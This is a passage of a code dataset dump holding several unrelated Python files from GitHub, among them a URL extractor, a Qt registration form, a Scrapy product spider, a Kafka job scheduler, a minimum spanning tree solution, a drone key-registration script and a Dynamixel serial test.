## url = tag.get(\"action\", None)\n elif name == \"object\":\n url = tag.get(\"data\", None)\n elif name == \"applet\":\n url = tag.get(\"code\", None)\n elif name == \"meta\":\n name = tag.get(\"name\", \"\").lower().strip()\n if name == \"http-equiv\":\n content = tag.get(\"content\", \"\")\n p = content.find(\";\")\n if p >= 0:\n url = content[ p + 1 : ]\n elif name == \"base\":\n url = tag.get(\"href\", None)\n if url is not None:\n\n # XXX FIXME\n # Unicode URLs are not supported.\n try:\n url = str(url)\n except Exception:\n warn(\"Unicode URLs not yet supported: %r\" % url)\n continue\n\n # Update the base URL.\n try:\n base_url = urljoin(base_url, url.strip(),\n allow_fragments = False)\n except Exception:\n continue\n\n # If we found an URL in this tag...\n if url is not None:\n\n # XXX FIXME\n # Unicode URLs are not supported.\n try:\n url = str(url)\n except Exception:\n warn(\"Unicode URLs not yet supported: %r\" % url)\n continue\n\n # Canonicalize the URL.\n try:\n url = urljoin(base_url, url.strip())\n except Exception:\n continue\n\n # Discard URLs that are not links to other pages or resources.\n if not only_links or is_link(url, base_url = base_url):\n\n # Add the URL to the set.\n add_result(url)\n\n # Return the set of collected URLs.\n return result\n\n\n#------------------------------------------------------------------------------\ndef extract(raw_data, content_type, base_url, only_links = True):\n \"\"\"\n Extract URLs from raw data.\n\n Implementation notes:\n\n - Unicode URLs are currently not supported.\n\n - The current implementation is fault tolerant, meaning it will try\n to extract URLs even if the HTML is malformed and browsers wouldn't\n normally see those links. This may therefore result in some false\n positives.\n\n - HTML5 tags are supported, including tags not currently supported by\n any major browser.\n\n :param raw_data: Raw data.\n :type raw_data: str\n\n :param content_type: MIME content type.\n :type content_type: str\n\n :param base_url: Base URL for the current document.\n :type base_url: str\n\n :param only_links: If True, only extract links to other resources.\n If False, extract all URLs.\n :type only_links: bool\n\n :returns: Extracted URLs.\n :rtype: set(str)\n \"\"\"\n\n # Sanitize the content type.\n content_type = content_type.strip().lower()\n if \";\" in content_type:\n content_type = content_type[ content_type.find(\";\") : ].strip()\n\n # HTML parser.\n if content_type == \"text/html\":\n urls = extract_from_html(raw_data, base_url, only_links)\n urls.update( extract_from_text(raw_data, base_url, only_links) )\n return urls\n\n # Generic plain text parser.\n if content_type.startswith(\"text/\"):\n return extract_from_text(raw_data, base_url, only_links)\n\n # Unsupported content type.\n return set()\n","repo_name":"golismero/golismero","sub_path":"golismero/api/net/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":12983,"program_lang":"python","lang":"en","doc_type":"code","stars":838,"dataset":"github-code","pt":"75"} +{"seq_id":"46649376772","text":"from PySide6.QtQml import QQmlApplicationEngine\nfrom PySide6.QtGui import QGuiApplication\nfrom PySide6.QtCore import QObject, Slot\nimport json\n\nimport sys, os\n\nAPP_ROOT = os.path.dirname(__file__)\nMAIN_QML = os.path.join(APP_ROOT, \"main.qml\")\n\n\nclass UserDataSaver(QObject):\n @Slot(str, str, str, str, str)\n def save_data(self, name, email, phone, address, about):\n user_data = {\n \"name\": name, \n \"email\": email, \n \"phone\": phone, \n \"address\": address, \n \"about\": about\n }\n\n with open(\"user_data.json\", \"w\") as f:\n json.dump(user_data, f)\n\n print(\"Data saved!\")\n\n\nclass RegistrationForm:\n def __init__(self) -> None:\n self.app = QGuiApplication(sys.argv)\n self.engine = QQmlApplicationEngine()\n self.root_context = self.engine.rootContext()\n\n self.user_data_save = UserDataSaver()\n self.root_context.setContextProperty(\"UserDataSaver\", self.user_data_save)\n\n self.engine.load(MAIN_QML)\n\n if not self.engine.rootObjects():\n sys.exit(-1)\n\n sys.exit(self.app.exec())\n\n\nif __name__ == \"__main__\":\n RegistrationForm()","repo_name":"robertvari/Qt_basics-230902","sub_path":"RegistrationForm_QtQuick.py","file_name":"RegistrationForm_QtQuick.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"33590661327","text":"from scrapy import Spider, Request\nfrom scrapy.http import FormRequest\nfrom .exceptions import BricolageScraperError\nimport re\nimport json\n\n\nclass QuotesSpider(Spider):\n\n \"\"\"\n Scraps items from www.mr-bricolage.bg and stores them to scraped_items.json\n To run the spider run from the terminal:\n scrapy crawl bricolage -a cat=CAT_NAME_WITHOUT_WHITESPACES\n Use \"-\" instead of white spaces for the category parameter.\n\n Class vars:\n\n :name: spider name, used to run the spider\n :cat: category for scraping\n :item_id: the sequence number of the scrapped items\n :passed_first_results_page: Indicates if the first\n page with item results is processed.\n Used to prevent double loading of the\n same first page in parse_items_pages()\n :tmp: stores the parsed items before sending\n them to the pipeline\n :home_url: Base url of the website to start scraping from\n :long_: Longitude coordinates\n :lat: Latitude coordinates,\n :found_cat: Indicates if the target subcategory is found\n \"\"\"\n\n name = \"bricolage\"\n cat = None\n item_id = 0\n passed_first_results_page = False\n tmp = []\n home_url = 'https://mr-bricolage.bg'\n long_ = None\n lat = None\n found_cat = False\n\n def __init__(self, cat=None):\n \"\"\" Assigns the category for parsing to an object var.\n\n params:\n :param cat: Category name with \"-\" instead of whitespaces\n :type cat: str \"\"\"\n\n if cat is None:\n err = \"\\nUsage: scrapy crawl bricolage -a cat=CAT_NAME_WITHOUT_WHITESPACES\"\n self.alert(err)\n self.cat = cat.replace(\"-\", \" \")\n\n def start_requests(self):\n \"\"\" Overwrites the scrapy.Spider start_requests() function and\n parses initialy https://mr-bricolage.bg/wro/all_responsive.js\n with a higher priority. From this page are extracted longitude\n and latitude, which are later needed to get store availability\n of the scraped items. The second page for processing is the main\n page which is later crawled for links and processed further in the\n callbacs chain. \"\"\"\n\n self.start_urls = [\n self.home_url,\n self.home_url + '/wro/all_responsive.js'\n ]\n for priority, url in enumerate(self.start_urls):\n yield Request(url=url, priority=priority, callback=self.parse)\n\n def parse(self, response):\n \"\"\" Yields the initial pages parsing from the corresponding function:\n either long/lat extraction or category extraction. \"\"\"\n\n if response.url != self.home_url:\n for _ in self.parse_long_lat(response):\n yield _\n else:\n for cat in self.parse_cats(response):\n yield cat\n\n def parse_long_lat(self, response):\n \"\"\" Parses the longitude and latitude needed\n for the store availability processing. \"\"\"\n\n try:\n self.lat = re.search('latitude:(\\-?[0-9]{1,2}\\.?[0-9]*)',\n response.text).group(1)\n self.long_ = re.search('longitude:(\\-?[0-9]{1,3}\\.?[0-9]*)',\n response.text).group(1)\n except AttributeError:\n msg = \"\\nCan't extract lat/long coordinates,\"\n msg += \" items availability will not be parsed.\"\n self.alert(msg, False)\n yield None\n\n def parse_cats(self, response):\n \"\"\" Parses the main categories and after that recursively calls itself\n with a meta var, indicating to parse the subcategories of each main\n category until the target category is found. Once the target category\n is found, send its link to parse_items_pages() which extracts the pages\n links and the product items.\n \"\"\"\n\n if response.meta.get('cat_type') != \"sub_cat\":\n cssSelector = 'span.yCmsComponent > a.item::attr(href)'\n main_cats = list(map(self.url, response.css(cssSelector).extract()))\n for main_cat in main_cats:\n yield Request(url=main_cat,\n callback=self.parse_cats,\n meta={'cat_type': 'sub_cat'})\n elif not self.found_cat:\n cats = response.css('a[title=\"%s\"]::attr(href)' % self.cat).extract()\n if cats:\n self.found_cat = True\n yield Request(url=self.url(cats[0]), callback=self.parse_items_pages)\n else:\n yield None\n\n def parse_items_pages(self, response):\n \"\"\"\n 1) Extracts the item links from the first page of the target category\n and sends them for parsing to parse_item()\n 2) Extract the next page links of the category from the first page and\n send them recursively to itself for item link extraction as in 1)\n \"\"\"\n\n links = response.css('a[href*=\"/p/\"][title]::attr(href)').extract()\n for link in links:\n yield Request(self.url(link), callback=self.parse_item)\n if not self.passed_first_results_page:\n self.passed_first_results_page = True\n page_num_url_init_string = response.url.replace(self.start_urls[0], \"\")\n page_num_url_init_string += \"?q=%3Arelevance&page=\"\n pages = response.css('a[class=\"\"][href*=\"%s\"]::attr(href)' %\n page_num_url_init_string).extract()\n for page in pages:\n yield Request(self.url(page), callback=self.parse_items_pages)\n\n def parse_item(self, response):\n \"\"\"\n Scraps:\n - the item price (called 'productcart' on the site),\n - the item name,\n - the item img url\n - vars needed to be sent to the 'actionurl' in order to get the stores availability\n Stores the items data in self.tmp[]\n Yields:\n The POST request to 'actionurl' for getting the store availability\n \"\"\"\n\n csrft_token = str(response.css('input[name=\"CSRFToken\"]::attr(value)').extract_first())\n selector_keys = '.product-classifications table tr :nth-child(1)'\n selector_vals = '.product-classifications table tr :nth-child(2)'\n characteristics_keys = response.css(selector_keys).extract()\n characteristics_vals = response.css(selector_vals).extract()\n res = {\n 'characteristics': dict(zip(characteristics_keys,\n characteristics_vals))\n }\n\n stock_fields = [\n \"cartpage\",\n \"entryNumber\",\n \"productname\",\n \"productcart\",\n \"img\",\n \"actionurl\"\n ]\n for field in stock_fields:\n res.update({\n field: str(response.css('a[href=\"#stock\"]::attr(data-%s)' %\n field).extract_first())\n })\n self.tmp.append(res)\n frmdata = {\n \"locationQuery\": \"\",\n \"cartPage\": res[\"cartpage\"],\n \"entryNumber\": res[\"entryNumber\"] if res[\"entryNumber\"] != \"None\" else \"0\",\n \"latitude\": self.lat,\n \"longitude\": self.long_,\n \"CSRFToken\": csrft_token\n }\n if self.lat is not None:\n yield FormRequest(self.url(res[\"actionurl\"]),\n callback=self.store_availability,\n method='POST', formdata=frmdata)\n else:\n yield self.tmp[self.item_id]\n self.item_id += 1\n\n def store_availability(self, response):\n \"\"\" Scraps the store availability of the item\n and send the item to the pipeline. \"\"\"\n\n stores = json.loads(response.text)[\"data\"]\n availability = [\n {\n store[\"displayName\"]:store[\"stockPickup\"].split(\" \")[0]\n } for store in stores\n ]\n self.tmp[self.item_id].update({\"availability\": availability})\n yield self.tmp[self.item_id]\n self.item_id += 1\n\n def url(self, link):\n \"\"\"\n Adds as a prefix the base URL of the target website to the parsed links.\n\n params:\n :param link: The link to which is added the prefix.\n :type link: str \"\"\"\n\n return self.home_url + link\n\n def alert(self, msg, is_fatal=True):\n \"\"\"\n Sends error alerts via SMS or email.\n Modify this function according to your own alert system style.\n\n params:\n\n :param msg: The error message\n :type msg: str\n :param is_fatal: if True, stops the script execution\n by raising an error, if False, goes on\n :type is_fatal: bool \"\"\"\n\n pass\n if not is_fatal:\n print(msg)\n else:\n raise BricolageScraperError(msg)\n","repo_name":"pastet89/bricolage-scraper","sub_path":"bricolage/spiders/bricolage.py","file_name":"bricolage.py","file_ext":"py","file_size_in_byte":9027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2184997414","text":"import psycopg2, sys, json, socket\nfrom confluent_kafka import Producer, Consumer, KafkaError, KafkaException\n\nconn = psycopg2.connect(database=\"scheduler\", user = \"postgres\", password = \"postgrespw\", host = \"host.docker.internal\", port = \"32768\")\ncur = conn.cursor()\n\nconsumer_conf = {\n 'bootstrap.servers': \"localhost:9092\",\n 'group.id': 'sched-job-complete',\n 'auto.offset.reset': 'smallest',\n 'client.id': socket.gethostname(),\n 'enable.auto.commit': 'false'\n}\n\nproducer_conf = {\n 'bootstrap.servers': \"localhost:9092\",\n 'client.id': socket.gethostname()\n}\n\nconsumer = Consumer(consumer_conf)\nproducer = Producer(producer_conf)\nrunning = True\n\ndef msg_process(msg):\n # Get message contents\n vals = json.loads(msg.value())\n\n # Update job_status table with message content\n sql = 'insert into job_status (timestamp, job_id, status, message) VALUES (\\'%s\\',%s,\\'%s\\',\\'%s\\');' % (vals[\"timestamp\"], vals[\"job_id\"], vals[\"status\"], vals[\"message\"])\n cur.execute(sql)\n print(sql)\n conn.commit()\n\n # Get next jobs that can run now\n sql = 'select next_job_id, job_type_name from next_job'\n cur.execute(sql)\n next_jobs = cur.fetchall()\n for job in next_jobs:\n sql = 'insert into job_status (timestamp, job_id, status, message) VALUES (\\'%s\\',%s,\\'%s\\',\\'%s\\');' % ('now()', job[0], 'Queued', '')\n print(sql)\n cur.execute(sql)\n producer.produce('sched-'+job[1]+'-start', value='{\"job_id\":\"%s\"}' % (job[0]))\n\n conn.commit()\n producer.flush()\n\n return True\n\ntry:\n consumer.subscribe(['sched-job-complete'])\n\n while running:\n msg = consumer.poll(timeout=1.0)\n if msg is None: continue\n\n if msg.error():\n if msg.error().code() == KafkaError._PARTITION_EOF:\n # End of partition event\n sys.stderr.write('%% %s [%d] reached end at offset %d\\n' % (msg.topic(), msg.partition(), msg.offset()))\n elif msg.error():\n raise KafkaException(msg.error())\n else:\n if msg_process(msg):\n consumer.commit(asynchronous=False)\nfinally:\n # Close down consumer to commit final offsets.\n cur.close()\n consumer.close()\n print('Exiting')\n\n","repo_name":"jreal1/sched","sub_path":"job-type/sched-job-complete.py","file_name":"sched-job-complete.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"41594500782","text":"from heapq import heappush, heappop\n\nV, E = map(int, input().split())\nadjacents = [[] for _ in range(V + 1)]\n\n# edge 구조는 [노드,비용]\nfor _ in range(E):\n a, b, c = map(int, input().split())\n adjacents[a].append([b, c])\n adjacents[b].append([a, c])\n\nvisited = [False] * (V + 1)\nheap = []\nfor node, cost in adjacents[1]:\n heappush(heap, (cost, node))\n\nanswer = 0\n# 시작 노드 방문처리\nvisited[1] = True\nwhile heap:\n # 항상 아직 연결되지 않은 노드들을 향하�� 엣지 중 가중치가 최소 순서로 가져온다.\n sCost, sNode = heappop(heap)\n\n # 그리고 아직 연결되지 않은 노드를 향하는 최소 엣지라면 방문 처리 후 결과 업데이트\n # 이미 연결된 노드라면 그냥 패스\n if not visited[sNode]:\n visited[sNode] = True\n answer += sCost\n else:\n continue\n\n # 인접 노드들 중 아직 연결되지 않은 노드들만 추가\n for adjacent, cost in adjacents[sNode]:\n # 연결된 노드와 인접한 노드들로 향하는 엣지들 중 아직 연결되지 않은 노드에 대해서만 추가한다.\n if not visited[adjacent]:\n heappush(heap, (cost, adjacent))\n\nprint(answer)\n","repo_name":"saehoon0501/AFJ","sub_path":"graph_traversal/최소 스패닝 트리(백준 1197).py","file_name":"최소 스패닝 트리(백준 1197).py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"74114651762","text":"import ECC\nimport hashlib\nimport time\nfrom random import SystemRandom \nrand=SystemRandom()\ncurve=ECC.secp256k1\n\ndef Init():\n \n ID_CR=rand.getrandbits(256)%curve.p\n ID_GSS=rand.getrandbits(256)%curve.p\n rCR = rand.getrandbits(256)%curve.p\n PubCR = curve.mul(curve.G,rCR)\n\n\n fp=open('CR.txt','a')\n fp.write(str(ID_CR)+'\\n')\n fp.write(str(rCR)+'\\n')\n fp.close()\n fp=open('GSS.txt','a')\n fp.write(str(ID_GSS)+'\\n')\n fp.close()\n fp=open('pub.txt','a')\n fp.write(str(PubCR)+'\\n')\n fp.close()\n fp=open('ID.txt','a')\n fp.write(str(ID_CR)+'\\n')\n fp.write(str(ID_GSS)+'\\n')\n fp.close()\n fp=open('multivariate.txt','a')\n for i in range(0,6):\n Aij = rand.getrandbits(256)%curve.p\n fp.write(str(Aij)+'\\n')\n fp.close()\n\n\ndef CR_to_DR1():\n ID_DRj=rand.getrandbits(256)%curve.p\n fp=open('DR.txt','a')\n fp.write(str(ID_DRj)+'\\n')\n fp.close()\n fp=open('ID.txt','a')\n fp.write(str(ID_DRj)+'\\n')\n fp.close()\n \n fp=open('CR.txt','r')\n l=fp.readlines()\n ID_CR = int(l[0])\n rCR=int(l[1])\n fp.close()\n fp=open('GSS.txt','r')\n l=fp.readlines()\n ID_GSS=int(l[0])\n fp.close()\n fp=open('pub.txt','r')\n l=fp.readlines()\n temp = l[0].split(',')\n xx = int(temp[0][1:])\n yy=int(temp[1].split(')')[0])\n PubCR = ECC.ECpoint(curve,xx,yy)\n fp.close()\n\n MKDRj=rand.getrandbits(256)%curve.p\n rDRj=rand.getrandbits(256)%curve.p\n PubDRj=curve.mul(curve.G,rDRj)\n TCDRj= ECC.hex2int(hashlib.sha256((str(MKDRj)+str(ID_DRj)+str(ID_CR)+str(ID_GSS)+str(int(time.time()))).encode(\"utf-8\")).hexdigest())\n Cert_DRj = (rDRj + ECC.hex2int(hashlib.sha256((str(PubDRj)+str(ID_GSS)+str(PubCR)).encode(\"utf-8\")).hexdigest())*rCR )\n fp=open('DR.txt','a')\n fp.write(str(TCDRj)+'\\n')\n fp.write(str(Cert_DRj)+'\\n')\n fp.write(str(PubDRj))\n fp.close()\n fp=open('pub.txt','a')\n fp.write(str(PubDRj)+'\\n')\n fp.close()\n\ndef CR_to_DR2():\n ID_DRj1=rand.getrandbits(256)%curve.p\n fp=open('DR1.txt','a')\n fp.write(str(ID_DRj1)+'\\n')\n fp.close()\n fp=open('ID.txt','a')\n fp.write(str(ID_DRj1)+'\\n')\n fp.close()\n \n fp=open('CR.txt','r')\n l=fp.readlines()\n ID_CR = int(l[0])\n rCR=int(l[1])\n fp.close()\n fp=open('GSS.txt','r')\n l=fp.readlines()\n ID_GSS=int(l[0])\n fp.close()\n fp=open('pub.txt','r')\n l=fp.readlines()\n temp = l[0].split(',')\n xx = int(temp[0][1:])\n yy=int(temp[1].split(')')[0])\n PubCR = ECC.ECpoint(curve,xx,yy)\n fp.close()\n\n MKDRj1=rand.getrandbits(256)%curve.p\n rDRj1=rand.getrandbits(256)%curve.p\n PubDRj1=curve.mul(curve.G,rDRj1)\n TCDRj1= ECC.hex2int(hashlib.sha256((str(MKDRj1)+str(ID_DRj1)+str(ID_CR)+str(ID_GSS)+str(int(time.time()))).encode(\"utf-8\")).hexdigest())\n Cert_DRj1 = (rDRj1 + ECC.hex2int(hashlib.sha256((str(PubDRj1)+str(ID_GSS)+str(PubCR)).encode(\"utf-8\")).hexdigest())*rCR )\n fp=open('DR1.txt','a')\n fp.write(str(TCDRj1)+'\\n')\n fp.write(str(Cert_DRj1)+'\\n')\n fp.write(str(PubDRj1))\n fp.close()\n fp=open('pub.txt','a')\n fp.write(str(PubDRj1)+'\\n')\n fp.close()\n\ndef CR_to_GSS():\n rGSS = rand.getrandbits(256)%curve.p \n PubGSS = curve.mul(curve.G,rGSS)\n fp=open('GSS.txt','r')\n l=fp.readlines()\n ID_GSS=int(l[0])\n fp.close()\n fp=open('CR.txt','r')\n l=fp.readlines()\n ID_CR = int(l[0])\n rCR=int(l[1])\n fp.close()\n fp=open('pub.txt','r')\n l=fp.readlines()\n temp = l[0].split(',')\n xx = int(temp[0][1:])\n yy=int(temp[1].split(')')[0])\n PubCR = ECC.ECpoint(curve,xx,yy)\n fp.close()\n Cert_GSS = (rGSS + ECC.hex2int(hashlib.sha256((str(PubGSS)+str(ID_GSS)+str(PubCR)).encode(\"utf-8\")).hexdigest())*rCR )\n TCGSS= ECC.hex2int(hashlib.sha256((str(ID_GSS)+str(ID_CR)+str(rGSS)+str(int(time.time()))).encode(\"utf-8\")).hexdigest())\n fp=open('GSS.txt','a')\n fp.write(str(TCGSS)+'\\n')\n fp.write(str(Cert_GSS)+'\\n')\n fp.write(str(PubGSS)+'\\n')\n fp.close()\n fp=open('pub.txt','a')\n fp.write(str(PubGSS)+'\\n')\n fp.close()\n\nInit()\nCR_to_DR1()\nCR_to_DR2()\nCR_to_GSS()\n","repo_name":"2019202009ankush/DroneSecurity","sub_path":"CR/Registration.py","file_name":"Registration.py","file_ext":"py","file_size_in_byte":4102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14894704108","text":"import struct\r\nimport os\r\nfrom socket import timeout\r\n\r\nif os.name == 'nt':\r\n import msvcrt\r\n def getch():\r\n return msvcrt.getch().decode()\r\nelse:\r\n import sys, tty, termios\r\n fd = sys.stdin.fileno()\r\n old_settings = termios.tcgetattr(fd)\r\n def getch():\r\n try:\r\n tty.setraw(sys.stdin.fileno())\r\n ch = sys.stdin.read(1)\r\n finally:\r\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\r\n return ch\r\n\r\nfrom dynamixel_sdk import * # Uses Dynamixel SDK library\r\nimport datetime\r\n\r\n\r\n############################ USER SCRIPT SETTINGS ###############################\r\n#################################################################################\r\n #\r\nUSART_SETTINGS = 0b10010000 #SET SETTINGS (use XFace manual) #\r\nDEVICE_NUMBER = 3 #SET NUMBER OF DEVICES (MIN 1) #\r\ntxbuf = [0x01, 0x02, 0x03] #SET TX BUFFER (any available length) #\r\n #\r\n#################################################################################\r\n\r\n\r\n# DXL settings\r\n\r\nPROTOCOL_VERSION = 1.0 # See which protocol version is used in the Dynamixel\r\nBROADCAST_ID = 0xFE\r\nDXL_ID = 161 # Dynamixel ID : 1\r\nBAUDRATE = 1000000 # Dynamixel default baudrate : 1000000\r\nDEVICENAME = '/dev/ttyS2' # Check which port is being used on your controller\r\n\r\n# XFACE registers map\r\n\r\nADDR_DEV_ID = 3\r\nADDR_SETTINGS = 34\r\nADDR_MODE_SELECT = 28\r\nADDR_DATA_LENGTH = 25\r\nADDR_BUF_A = 26\r\nADDR_USART_ENABLE = 29\r\nADDR_STATUS_A = 35\r\n\r\n# XFACE settings\r\n\r\nMODE_UART_USARTM = 36\r\nMODE_USART_SLAVE = 37\r\n\r\ntxrx_result = 0\r\nSUCCESS = 1\r\n\r\nportHandler = PortHandler(DEVICENAME)\r\npacketHandler = PacketHandler(PROTOCOL_VERSION)\r\n\r\n\r\ndef port_open():\r\n # Open port\r\n os.system('../rs485 /dev/ttyS2 1')\r\n if portHandler.openPort():\r\n print(\"Succeeded to open the port\")\r\n else:\r\n print(\"Failed to open the port\")\r\n print(\"Press any key to terminate...\")\r\n getch()\r\n quit()\r\n\r\n # Set port baudrate\r\n if portHandler.setBaudRate(BAUDRATE):\r\n print(\"Succeeded to change the baudrate\")\r\n else:\r\n print(\"Failed to change the baudrate\")\r\n print(\"Press any key to terminate...\")\r\n getch()\r\n quit()\r\n print(\"\")\r\n\r\n####################### SHOW INFO ####################################\r\n\r\ndef show_info():\r\n print(\"INTERFACE SETTINGS:\")\r\n print(\"\")\r\n print(\"Number of devices:\", DEVICE_NUMBER)\r\n\r\n print (\"\")\r\n if(USART_SETTINGS & 0b10000000):\r\n print (\"MODE: USART\")\r\n print(\"CPOL =\", (USART_SETTINGS & 0b00000001))\r\n print(\"CPHA =\", ((USART_SETTINGS & 0b00000010)>>1))\r\n else:\r\n print (\"MODE: UART\")\r\n \r\n print (\"\")\r\n print(\"BAUDRATE:\")\r\n\r\n if (USART_SETTINGS & 0b00001000):\r\n print (\"9600\")\r\n elif (USART_SETTINGS & 0b00010000):\r\n print (\"19200\")\r\n elif ((USART_SETTINGS & 0b00011000) == 0b00011000):\r\n print (\"57600\")\r\n elif (USART_SETTINGS & 0b00100000):\r\n print (\"115200\")\r\n elif ((USART_SETTINGS & 0b00101000) == 0b00101000):\r\n print (\"200000\")\r\n elif ((USART_SETTINGS & 0b00110000) == 0b00110000):\r\n print (\"250000\")\r\n elif ((USART_SETTINGS & 0b00111000) == 0b00111000):\r\n print (\"400000\")\r\n elif (USART_SETTINGS & 0b01000000):\r\n print (\"500000\")\r\n elif ((USART_SETTINGS & 0b01001000) == 0b01001000):\r\n print (\"1000000\")\r\n\r\n print (\"\")\r\n print (\"WORD LENGTH:\")\r\n \r\n if(USART_SETTINGS & 0b00000100):\r\n print (\"9 BIT\")\r\n else:\r\n print (\"8 BIT\")\r\n\r\n print (\"\")\r\n\r\n####################### SET DEFAULT IDs ##############################\r\ndef set_def_id():\r\n\r\n dev_id = DXL_ID\r\n while dev_id < (DXL_ID+DEVICE_NUMBER):\r\n dev_id += 1\r\n \r\n dxl_comm_result = 1\r\n while dxl_comm_result != COMM_SUCCESS:\r\n dxl_comm_result, dxl_error = packetHandler.write1ByteTxRx(portHandler, dev_id, 0, 0)\r\n\r\n print(\"DEVICE\", (dev_id-DXL_ID), \"found\")\r\n \r\n dxl_comm_result = 1\r\n while dxl_comm_result != COMM_SUCCESS:\r\n dxl_comm_result, dxl_error = packetHandler.write1ByteTxRx(portHandler, dev_id, ADDR_DEV_ID, DXL_ID)\r\n\r\n print(\"Set default ID:\", DXL_ID, \"for DEVICE\", (dev_id-DXL_ID))\r\n \r\n #dxl_comm_result, dxl_error = packetHandler.write1ByteTxRx(portHandler, BROADCAST_ID, ADDR_DEV_ID, DXL_ID)\r\n print(\"Disconnect devices\")\r\n print(\"\")\r\n\r\n###################### SET DIFFERENT IDs #############################\r\ndef id_set():\r\n dev_id = DXL_ID\r\n while dev_id < (DXL_ID+DEVICE_NUMBER):\r\n print(\"Connect DEVICE\", (dev_id-DXL_ID+1))\r\n while True: \r\n dev_id += 1\r\n\r\n dxl_comm_result = 1\r\n while dxl_comm_result != COMM_SUCCESS:\r\n dxl_comm_result, dxl_error = packetHandler.write1ByteTxRx(portHandler, DXL_ID, 0, 0)\r\n\r\n print(\"DEVICE\", (dev_id-DXL_ID), \"found\")\r\n \r\n dxl_comm_result = 1\r\n while dxl_comm_result != COMM_SUCCESS:\r\n dxl_comm_result, dxl_error = packetHandler.write1ByteTxRx(portHandler, DXL_ID, ADDR_DEV_ID, dev_id)\r\n \r\n print(\"Set ID:\", (dev_id), \"for DEVICE\", (dev_id-DXL_ID))\r\n break\r\n\r\n print(\"\")\r\n time.sleep(1)\r\n\r\n############################ USART SETTINGS ##########################\r\n\r\n\r\ndef usart_set(master_id, slave_id):\r\n\r\n dxl_comm_result = 1\r\n while dxl_comm_result != COMM_SUCCESS:\r\n dxl_comm_result, dxl_error = packetHandler.write1ByteTxRx(portHandler, master_id , ADDR_MODE_SELECT, MODE_UART_USARTM)\r\n\r\n print(\"Mode selected for DEVICE\", (master_id - DXL_ID), \"with ID\", master_id)\r\n\r\n dxl_comm_result = 1\r\n while dxl_comm_result != COMM_SUCCESS:\r\n if(USART_SETTINGS & 0b10000000):\r\n dxl_comm_result, dxl_error = packetHandler.write1ByteTxRx(portHandler, slave_id , ADDR_MODE_SELECT, MODE_USART_SLAVE)\r\n else:\r\n dxl_comm_result, dxl_error = packetHandler.write1ByteTxRx(portHandler, slave_id , ADDR_MODE_SELECT, MODE_UART_USARTM)\r\n \r\n print(\"Mode selected for DEVICE\", (slave_id - DXL_ID), \"with ID\", slave_id)\r\n \r\n time.sleep(0.5)\r\n\r\n for id in master_id, slave_id:\r\n dxl_comm_result = 1\r\n while dxl_comm_result != COMM_SUCCESS:\r\n dxl_comm_result, dxl_error = packetHandler.write1ByteTxRx(portHandler, id, ADDR_SETTINGS, USART_SETTINGS)\r\n \r\n print(\"Settings installed for DEVICE\", (master_id-DXL_ID), \"with ID\", id)\r\n\r\n time.sleep(0.5)\r\n\r\n print(\"\")\r\n\r\n###################### USART TRANSMIT (DEVICE 1) ########################\r\n\r\ndef usart_send(master_id, slave_id):\r\n\r\n for id in master_id, slave_id:\r\n dxl_comm_result = 1\r\n while dxl_comm_result != COMM_SUCCESS:\r\n dxl_comm_result, dxl_error = packetHandler.write1ByteTxRx(portHandler, id, ADDR_DATA_LENGTH, len(txbuf))\r\n \r\n print(\"Length set for DEVICE\", (id - DXL_ID), \"with ID\", id)\r\n \r\n print (\"\")\r\n\r\n dxl_comm_result = 1\r\n while dxl_comm_result != COMM_SUCCESS:\r\n dxl_comm_result, dxl_error = packetHandler.writeTxRx(portHandler, master_id, ADDR_BUF_A, len(txbuf), txbuf)\r\n \r\n print(\"TX buffer set for DEVICE 1:\", txbuf, \"with ID\", master_id)\r\n print(\"\")\r\n \r\n for id in slave_id, master_id:\r\n dxl_comm_result = 1\r\n while dxl_comm_result != COMM_SUCCESS:\r\n dxl_comm_result, dxl_error = packetHandler.write1ByteTxRx(portHandler, id, ADDR_USART_ENABLE, 2)\r\n \r\n print(\"Start transmitting\")\r\n print(\"\")\r\n time.sleep(0.5)\r\n\r\n###################### USART READ (DEVICE 2 ... n) ##########################\r\n\r\ndef usart_read(slave_id):\r\n rxbuf = []\r\n global txrx_result\r\n \r\n dxl_comm_result = 1\r\n while dxl_comm_result != COMM_SUCCESS:\r\n rxbuf, dxl_comm_result, dxl_error = packetHandler.readTxRx(portHandler, slave_id, ADDR_BUF_A, len(txbuf))\r\n\r\n print(\"RX buffer of DEVICE\", (slave_id - DXL_ID), \"with ID\", slave_id, \":\", rxbuf)\r\n print(\"\")\r\n\r\n if rxbuf == txbuf:\r\n txrx_result = SUCCESS\r\n print(\"Successful transmit\")\r\n else:\r\n txrx_result = 0\r\n print(\"Unsuccessful transmit\")\r\n print(\"Trying again...\")\r\n \r\n print(\"\")\r\n time.sleep(0.2)\r\n\r\ndef usart_ring_txrx():\r\n dev_id = DXL_ID\r\n global txrx_result\r\n\r\n while dev_id < DXL_ID+DEVICE_NUMBER:\r\n dev_id += 1\r\n\r\n master_id = dev_id\r\n if(master_id == DXL_ID+DEVICE_NUMBER):\r\n slave_id = DXL_ID+1\r\n else:\r\n slave_id = master_id+1\r\n\r\n print(\"\")\r\n print(\"ROUND\", (dev_id-DXL_ID))\r\n print(\"Master ID:\", master_id)\r\n print(\"Slave ID:\", slave_id)\r\n\r\n usart_set(master_id, slave_id)\r\n while txrx_result != SUCCESS:\r\n usart_send(master_id, slave_id)\r\n usart_read(slave_id)\r\n time.sleep(1)\r\n txrx_result = 0\r\n\r\ntry:\r\n port_open()\r\n show_info()\r\n id_set()\r\n usart_ring_txrx()\r\n set_def_id()\r\n# usart_set(self, )\r\nexcept KeyboardInterrupt:\r\n time.sleep(0.5)\r\n\r\nportHandler.closePort()\r\nquit()","repo_name":"AppliedRobotics/sensors_dxl_updater","sub_path":"xface_test/usart_test_circle.py","file_name":"usart_test_circle.py","file_ext":"py","file_size_in_byte":9622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"4186371021","text":"import os\nimport 